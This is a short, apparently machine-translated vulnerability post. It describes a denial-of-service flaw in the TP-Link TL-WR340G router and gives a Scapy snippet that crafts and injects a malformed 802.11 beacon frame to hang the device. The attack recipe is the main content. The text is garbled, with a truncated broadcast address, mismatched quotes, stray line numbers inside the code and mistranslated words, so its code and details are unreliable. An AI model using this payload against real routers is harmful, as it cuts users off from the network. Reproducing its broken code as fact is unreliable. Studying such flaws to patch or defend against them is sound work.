TL-WR340G is a lightweight wireless router produced by TP-Link, recently foreign Hackers found a denial of service vulnerability on this router, as long as a simple malformed package to the router, the router can be stopped. You need to manually restart the router to restore the normal operation. This is a serious problem.
Vulnerability details:
Model: TL-WR340G Wireless Router
Firmware Version: 4.7.11 Build 101102 Rel.60376n
Hardware version: WR340G v3
The process of triggering a vulnerability is very simple. You need to use the network software Scapy. The details of constructing a package are as follows:
1 fr = RadioTap ()/Dot11 (addr1 = "ff: ff", addr2 = "<AP
2 MAC> ", addr3 =" <ap mac> ")/Dot11Beacon ()/Dot11Elt ()
Next, send the data packet:
1 sendp (fr, iface = "injection capable wireless interface", count = 5)
After the attack is successful, the vro will be directly suspended. This means that no connected or unconnected client can connect to the Internet, unless you manually log on to the management interface to restart the system or restart the system after a power failure.